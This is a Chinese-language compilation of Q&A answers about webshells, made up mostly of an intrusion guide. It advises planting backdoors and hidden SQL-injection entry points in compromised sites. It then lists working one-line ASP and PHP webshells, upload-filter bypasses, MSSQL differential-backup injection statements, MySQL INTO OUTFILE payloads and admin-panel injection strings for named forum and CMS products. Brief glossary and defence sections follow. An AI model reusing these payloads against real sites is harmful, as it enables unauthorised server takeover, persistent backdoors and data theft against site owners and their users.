webshell代碼

❶ 如何給webshell添加後門！求具體常式！麻煩各位了！

這個例子還真不好說，關鍵是留後門的前提是你已經入侵進去了或者本身代碼就是你提供的。如果是這樣那方法有一下可用：

1. 放置一個muma程序在一個比較深的目錄，當然muma有你想實現的功能；

2. 放置一個腳本在一個比較深的目錄，其實和1一樣，只不過腳本的話更不容易被發現，腳本內容你隨便寫啦，比如打開某個埠啊，外傳某個文件啊，最後別忘了加開機啟動；

3. 最後一點嘛，如果你有操作代碼的許可權，那麼，留個sql-injec入口，當然啦，找個比較隱秘的頁面留，這樣不容易被發現。

❷ 如何寫 ASP webshell腳本

ASP大馬和小馬屬於網頁腳本語言
編寫ASP腳本需要有相關的知識，沒有可以學HTML ，CSS，javascript,資料庫，ASP（你估計要幾個月，有基礎一個月差不多）
一句話木馬交伺服器執行，客戶端創建組件，保存所輸入的ASP文件（大馬）
後台上傳很多方法，一般改成JPG圖片類型上傳.......（需要改成ASP後綴才可以執行）

注意：你的行為已觸犯法規，請不要破壞網站數據，請自重。
建議你本地安裝IIS，本地操作。（推薦）

❸ 什麼叫webshell ,什麼叫注入,什麼叫旁註,還有一些常用工具的功能,比如nc,sc等等

黑客基本入門，不知道是不是你想要的
1.肉雞：所謂「肉雞」是一種很形象的比喻，比喻那些可以隨意被我們控制的電腦，對方可以是WINDOWS系統，也可以是UNIX/LINUX系統，可以是普通的個人電腦，也可以是大型的伺服器，我們可以象操作自己的電腦那樣來操作它們，而不被對方所發覺。

2.木馬：就是那些表面上偽裝成了正常的程序，但是當這些被程序運行時，就會獲取系統的整個控制許可權。有很多黑客就是 熱中與使用木馬程序來控制別人的電腦，比如灰鴿子，黑洞，PcShare等等。

3.網頁木馬：表面上偽裝成普通的網頁文件或是將而已的代碼直接插入到正常的網頁文件中，當有人訪問時，網頁木馬就會利用對方系統或者瀏覽器的漏洞自動將配置好的木馬的服務端下載到訪問者的電腦上來自動執行。

4.掛馬：就是在別人的網站文件裡面放入網頁木馬或者是將代碼潛入到對方正常的網頁文件里，以使瀏覽者中馬。

5.後門：這是一種形象的比喻，入侵者在利用某些方法成功的控制了目標主機後，可以在對方的系統中植入特定的程序，或者是修改某些設置。這些改動表面上是很難被察覺的，但是入侵者卻可以使用相應的程序或者方法來輕易的與這台電腦建立連接，重新控制這台電腦，就好象是入侵者偷偷的配了一把主人房間的要是，可以隨時進出而不被主人發現一樣。

通常大多數的特洛伊木馬(Trojan Horse)程序都可以被入侵者用語製作後門(BackDoor)

6.rootkit：rootkit是攻擊者用來隱藏自己的行蹤和保留root(根許可權，可以理解成WINDOWS下的system或者管理員許可權)訪問許可權的工具。通常，攻擊者通過遠程攻擊的方式獲得root訪問許可權，或者是先使用密碼猜解(破解)的方式獲得對系統的普通訪問許可權，進入系統後，再通過，對方系統內存在的安全漏洞獲得系統的root許可權。然後，攻擊者就會在對方的系統中安裝rootkit，以達到自己長久控制對方的目的，rootkit與我們前邊提到的木馬和後門很類似，但遠比它們要隱蔽，黑客守衛者就是很典型的rootkit，還有國內的ntroorkit等都是不錯的rootkit工具。

7.IPC$：是共享「命名管道」的資源，它是為了讓進程間通信而開放的餓命名管道，可以通過驗證用戶名和密碼獲得相應的許可權，在遠程管理計算機和查看計算機的共享資源時使用。

8.弱口令：指那些強度不夠，容易被猜解的，類似123，abc這樣的口令(密碼)

9.默認共享：默認共享是WINDOWS2000/XP/2003系統開啟共享服務時自動開啟所有硬碟的共享，因為加了"$"符號，所以看不到共享的托手圖表，也成為隱藏共享。

10.shell：指的是一種命令指行環境，比如我們按下鍵盤上的「開始鍵+R」時出現「運行」對話框，在裡面輸入「cmd」會出現一個用於執行命令的黑窗口，這個就是WINDOWS的Shell執行環境。通常我們使用遠程溢出程序成功溢出遠程電腦後得到的那個用於執行系統命令的環境就是對方的shell

11.WebShell：WebShell就是以asp、php、jsp或者cgi等網頁文件形式存在的一種命令執行環境，也可以將其稱做是一種網頁後門。黑客在入侵了一個網站後，通常會將這些asp或php後門文件與網站伺服器WEB目錄下正常的網頁文件混在一起，好後就可以使用瀏覽器來訪問這些asp 或者php後門，得到一個命令執行環境，以達到控制網站伺服器的目的。可以上傳下載文件，查看資料庫，執行任意程序命令等。國內常用的WebShell有海陽ASP木馬，Phpspy，c99shell等

12.溢出：確切的講，應該是「緩沖區溢出」。簡單的解釋就是程序對接受的輸入數據沒有執行有效的檢測而導致錯誤，後果可能是造成程序崩潰或者是執行攻擊者的命令。大致可以分為兩類：(1)堆溢出;(2)棧溢出。

❹ webshell攻擊

webshell只是個許可權,我不知道你為什麼說成攻擊... 可能是你想把asp馬，已圖片格式上傳到伺服器上然後執行這個路徑拿到webshell許可權...這樣可以,但是必須把圖片格式改成asp後戳的文件,不然不能執行... 不過可以通過,後台的資料庫差異備份把jpg格式備份成asp或者sas的文件...還可以通過抓包的方式本地上傳方式解決這個問題!!

❺ 如何從後台得到webshell

注意：如何進入後台，不是本文討論范圍，其具體方法就不說了，靠大家去自己發揮。此文參考了前人的多方面的資料和信息，在此一並表示感謝。

一、直接上傳獲得webshell

這種對php和jsp的一些程序比較常見，MolyX BOARD就是其中一例，直接在心情圖標管理上傳.php類型，雖然沒有提示，其實已經成功了，上傳的文件url應該是

，前一陣子的聯眾游戲站和網易的jsp系統漏洞就可以直接上傳jsp文件。文件名是原來的文件名，bo-blog後台可以可以直接上傳.php文件，上傳的文件路徑有提示。以及一年前十分流行的upfile.asp漏洞(動網5.0和6.0、早期的許多整站系統)，因過濾上傳文件不嚴，導致用戶可以直接上傳webshell到網站任意可寫目錄中，從而拿到網站的管理員控制許可權。

二、添加修改上傳類型

現在很多的腳本程序上傳模塊不是只允許上傳合法文件類型，而大多數的系統是允許添加上傳類型，bbsxp後台可以添加asaasP類型，ewebeditor的後台也可添加asa類型,通過修改後我們可以直接上傳asa後綴的webshell了,還有一種情況是過濾了.asp，可以添加.aspasp的文件類型來上傳獲得webshell。php系統的後台，我們可以添加.php.g1f的上傳類型，這是php的一個特性,最後的哪個只要不是已知的文件類型即可，php會將php.g1f作為.php來正常運行,從而也可成功拿到shell。LeadBbs3.14後台獲得webshell方法是：在上傳類型中增加asp ，注意，asp後面是有個空格的，然後在前台上傳ASP馬，當然也要在後面加個空格！

三、利用後台管理功能寫入webshell

上傳漏洞基本上補的也差不多了,所以我們進入後台後還可以通過修改相關文件來寫入webshell。比較的典型的有dvbbs6.0，還有leadbbs2.88等，直接在後台修改配置文件，寫入後綴是asp的文件。而LeadBbs3.14後台獲得webshell另一方法是：添加一個新的友情鏈接，在網站名稱處寫上冰狐最小馬即可,最小馬前後要隨便輸入一些字元，http:\網站incIncHtmBoardLink.asp就是我們想要的shell。

四、利用後台管理向配置文件寫webshell

利用"""":""//"等符號構造最小馬寫入程序的配置文件，joekoe論壇，某某同學錄，沸騰展望新聞系統，COCOON Counter統計程序等等，還有很多php程序都可以，COCOON Counter統計程序舉例，在管理郵箱處添上[email protected]":eval request(chr (35))//, 在配製文件中就是webmail="[email protected]":eval request(chr(35))//"，還有一種方法就是寫上 [email protected]"%＞＜%eval request(chr(35))%＞＜%'，這樣就會形成前後對應，最小馬也就運行了。＜%eval request(chr(35))%＞可以用lake2的eval發送端以及最新的2006 客戶端來連，需要說明的是資料庫插馬時候要選前者。再如動易2005，到文章中心管理-頂部菜單設置-菜單其它特效，插入一句話馬"%＞＜%execute request("l")%＞＜%'，保 存頂部欄目菜單參數設置成功後，我們就得到馬地址http://網站/admin/rootclass_menu_config.asp。


五、利用後台資料庫備份及恢復獲得webshell

主要是利用後台對access資料庫的「備份資料庫」或「恢復資料庫」功能，「備份的資料庫路徑」等變數沒有過濾導致可以把任意文件後綴改 為asp，從而得到webshell，msssql版的程序就直接應用了access版的代碼，導致sql版照樣可以利用。還可以備份網站asp文件為其他後綴 如.txt文件，從而可以查看並獲得網頁源代碼，並獲得更多的程序信息增加獲得webshell的機會。在實際運用中經常會碰到沒有上傳功能的時 候，但是有asp系統在運行，利用此方法來查看源代碼來獲得其資料庫的位置，為資料庫插馬來創造機會，動網論壇就有一個ip地址的資料庫，在後台的ip管理中可以插入最小馬然後備份成.asp文件即可。在談談突破上傳檢測的方法，很多asp程序在即使改了後綴名後也會提示文件非法，通過在.asp文件頭加上gif89a修改後綴為gif來騙過asp程序檢測達到上傳的目的，還有一種就是用記事本打開圖片文件，隨便粘貼一部分復制到asp木馬文件頭，修改gif後綴後上傳也可以突破檢測，然後備份為.asp文件，成功得到webshell。

六、利用資料庫壓縮功能

可以將數據的防下載失效從而使插入資料庫的最小馬成功運行，比較典型的就是loveyuki的L-BLOG，在友情添加的url出寫上＜%eval request (chr(35))%＞, 提交後，在資料庫操作中壓縮資料庫，可以成功壓縮出.asp文件，用海洋的最小馬的eval客戶端連就得到一個webshell。

七、asp+mssql系統

這里需要提一點動網mssql版，但是可以直接本地提交來備份的。首先在發帖那上傳一個寫有asp代碼的假圖片，然後記住其上傳路徑。寫一個本地提交的表單，代碼如下：

＜form action=http://網站/bbs/admin_data.asp?action=RestoreData&act=Restore method="post"＞

＜p＞已上傳文件的位置：＜input name="Dbpath" type="text" size="80"＞＜/p＞

＜p＞要復制到的位置：＜input name="backpath" type="text" size="80"＞＜/p＞

＜p＞＜input type="submit" value="提交"＞＜/p＞ ＜/form＞

另存為.htm本地執行。把假圖片上傳路徑填在「已上傳文件的位置」那裡，想要備份的WebShell的相對路徑填寫在「要復制到的位置」那裡，提交就得到我們可愛的WebShell了，恢復代碼和此類似，修改相關地方就可以了。沒有遇到過後台執行mssql命令比較強大的asp程序後台，動網的資料庫還原和備份是個擺設，不能執行sql命令備份webshell，只能執行一些簡單的查詢命令。可以利用mssql注入差異備份webshell，一般後台是顯示了絕對路徑，只要有了注入點基本上就可以差異備份成功。下面是差異備份的主要語句代碼，利用動網7.0的注入漏洞可以用差異備份一個webshell，可以用利用上面提到的方法，將conn.asp文件備份成.txt文件而獲得庫名。

差異備份的主要代碼：

;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x626273 backup database @a to disk=@s--

;Drop table [heige];create table [dbo].[heige] ([cmd] [image])--

;insert into heige(cmd) values()--

;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C7765625C312E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--

這段代碼中，0x626273是要備份的庫名bbs的十六進制，可以是其他名字比如bbs.bak; 是＜%execute request("l")%＞的十六進制，是lp最小馬；0x643A5C7765625C312E617370是d:web1.asp的十六進制,也就是你要備份的webshell路徑。當然也可以用比較常見備份方式來獲得webshell，唯一的不足就是備份後的文件過大，如果備份資料庫中有防下載的的數據表，或者有錯誤的asp代碼，備份出來的webshell就不會成功運行，利用差異備份是成功率比較高的方法，並且極大的減少備份文件的大小。

八、php+mysql系統

後台需要有mysql數據查詢功能,我們就可以利用它執行SELECT ... INTO OUTFILE查詢輸出php文件，因為所有的數據是存放在mysql里的，所以我們可以通過正常手段把我們的webshell代碼插入mysql在利用SELECT ... INTO OUTFILE語句導出shell。在mysql操作里輸入select from mysql.user into outfile '路徑』 就可以獲得了一個＜?eval($_POST[a]);?＞的最小馬' 是我們＜?eval($_POST[a]);?＞的十六進制，這種方法對phpmyadmin比較普遍，先利用phpmyadmin的路徑泄露漏洞，比較典型的 是http://url/phpmyadmin/libraries/select_lang.lib.php。

就可以暴出路徑，php環境中比較容易暴出絕對路徑：）。提一點的是遇到是mysql在win系統下路徑應該這樣寫d:\wwwroot\a.php。下面的方法是比較常用的一個導出webshell的方法，也可以寫個vbs添加系統管理員的腳本導出到啟動文件夾，系統重起後就會添加一個管理員帳號

CREATE TABLE a(cmd text NOT NULL)

INSERT INTO a(cmd) VALUES('＜?fputs(fopen("./a.php","w"),"＜?eval($_POST[a]);?＞")?＞')

select cmd from a into outfile '路徑/b.php'

DROP TABLE IF EXISTS a

訪問b.php就會生成一個＜?eval($_POST[a]);?＞的最小馬。

如果遇到可以執行php命令就簡單多了,典型的代表是BO-BLOG,在後台的php命令框輸入以下代碼：

＜?

$sa = fopen("./up/saiy.php","w");

fwrite($sa,"＜?eval($_POST[a]);?"."＞");

fclose($sa);

?＞

就會在up目錄下生成文件名為saiy.php內容為＜?eval($_POST[a]);?＞的最小php木馬， 最後用lanker的客戶端來連接。實際運用中要考慮到文件夾是否有寫許可權。或者輸入這樣的代碼＜?fputs(fopen("./a.php","w"),"＜?eval($_POST[a]);?＞")?＞ 將會在當前目錄生成一個a.php的最小馬。

九、phpwind論壇從後台到webshell的三種方式

方式1 模板法

進入後台， 風格模版設置 ，在隨便一行寫代碼，記住，這代碼必須頂著左邊行寫，代碼前面不可以有任何字元。

EOT;

eval($a);

print ＜＜＜EOT

而後得到一個shell為http://網站/bbs/index.php。

方始2 臟話過濾法

進入安全管理 ◇ 不良詞語過濾。新增不良詞語寫 a』]=』aa』;eval($_POST[』a』]);//

替換為那裡可以隨意寫，而後得到一個shell地址為http://網站/bbs/data/bbscache/wordsfb.php。

方式3 用戶等級管理

新建立會員組，頭銜你可以隨便寫，但是千萬不要寫單雙引號特殊符號，升級圖片號寫a』;eval($_POST[』a』]);// ，升級點數依然可以隨意寫。而後得到一個shell地址為http://網站/bbs/data/bbscache/level.php。

以上三種方式得到webshellr的密碼是a,為lanker的一句話後門服務端。

十、也可以利用網站訪問計數系統記錄來獲得webshell

最明顯的就是某私服程序內的阿江計數程序，可以通過http://網站/stat.asp?style=textreferer= 代碼內容&screenwidth=1024直接提交， 即可把代碼內容直接插入到計數系統的資料庫中，而此系統默認資料庫為count#.asa，我們可以通過http://網站/count%23.asa訪問得到webshell，由於阿江計數程序過濾了%和+，將最小馬改成＜SCRIPT RUNAT=SERVER LANGUAGE=vbSCRIPT＞eval(Request("1"))＜/SCRIPT＞替換代碼內容處提交，然後用lake2的eval客戶端來提交，值得一提的是如果進到計數後台，可以清理某時某刻的數據，一旦插入asp木馬失敗，可以清理資料庫再次操作。

❻ 在webshell里怎麼執行cmd命令

默認調用 system32目錄的net.exe 。
要是調用不到，只能傳cmd.exe 文件到執行目錄。把路徑填上，
就可以調用執行簡單命令了,asp組建要支持是前期,aspx默認不需要

❼ 什麼是webshell .. webshell是干什麼用的

首先普及一下，webshell是網站後台的管理許可權。

webshell一大部分是搜索命令：

1、檢查命令是否包含斜杠。如果沒有首先檢查函數列表是否包含所要尋找的命令。

2、如果命令不是一個函數，那麼在內建命令列表檢查。

3、如果命令既不是函數也不是內建命令，那麼掃描列表。

4、如果搜索沒有成功，會列印一條錯誤的消息並且推出。

5、如果搜索成功，shell在一個單獨執行環境中執行這個命令。

❽ webshell怎麼使用

方法：

1、准備好webshell資源，質量要高一些的。

2、使用工具比如菜刀,一米單頁shell,等等別忘記語言的選擇。

3、然後把shell上傳選擇合適的模板，批量上傳就可以。

4、檢查網頁的存活率。

❾ WEBSHELL是什麼

webshell是什麼？

顧名思義，"web" - 顯然需要伺服器開放web服務,"shell" - 取得對伺服器某種程度上操作許可權。

webshell常常被稱為匿名用戶(入侵者)通過WEB服務埠對WEB伺服器有某種程度上操作的許可權,由於其大多是以網頁腳本的形式出現，也有人稱之為網站後門工具。

2、webshell有什麼作用？

一方面，webshell被站長常常用於網站管理、伺服器管理等等，根據FSO許可權的不同，作用有在線編輯網頁腳本、上傳下載文件、查看資料庫、執行任意程序命令等。

另一方面，被入侵者利用，從而達到控制網站伺服器的目的。這些網頁腳本常稱為WEB

腳本木馬，目前比較流行的asp或php木馬，也有基於.NET的腳本木馬。

對於後者我本人是反對的，畢竟人要厚道。

3、webshell的隱蔽性

有些惡意網頁腳本可以嵌套在正常網頁中運行，且不容易被查殺。

webshell可以穿越伺服器防火牆，由於與被控制的伺服器或遠程主機交換的數據都是通過80埠傳遞的，因此不會被防火牆攔截。並且使用webshell一般不會在系統日誌中留下記錄，只會在網站的web日誌中留下一些數據提交記錄，沒有經驗的管理員是很難看出入侵痕跡的。

4、如何防範惡意後門？

從根本上解決動態網頁腳本的安全問題，要做到防注入、防暴庫、防COOKIES欺騙、防跨站攻擊等等，務必配置好伺服器FSO許可權。

希望看過本詞條的人，發表一下你是如何防範惡意WEBSHELL後門的。

❿ WEBSHELL是什麼

webshell常常被稱為匿名用戶(入侵者)通過WEB服務埠對WEB伺服器有某種程度上操作的許可權,由於其大多是以網頁腳本的形式出現，也有人稱之為網站後門工具。

一方面，webshell被站長常常用於網站管理、伺服器管理等等，根據FSO許可權的不同，作用有在線編輯網頁腳本、上傳下載文件、查看資料庫、執行任意程序命令等。

另一方面，被入侵者利用，從而達到控制網站伺服器的目的。這些網頁腳本常稱為WEB

腳本木馬，目前比較流行的asp或php木馬，也有基於.NET的腳本木馬。

有些惡意網頁腳本可以嵌套在正常網頁中運行，且不容易被查殺。

webshell可以穿越伺服器防火牆，由於與被控制的伺服器或遠程主機交換的數據都是通過80埠傳遞的，因此不會被防火牆攔截。並且使用webshell一般不會在系統日誌中留下記錄，只會在網站的web日誌中留下一些數據提交記錄，沒有經驗的管理員是很難看出入侵痕跡的。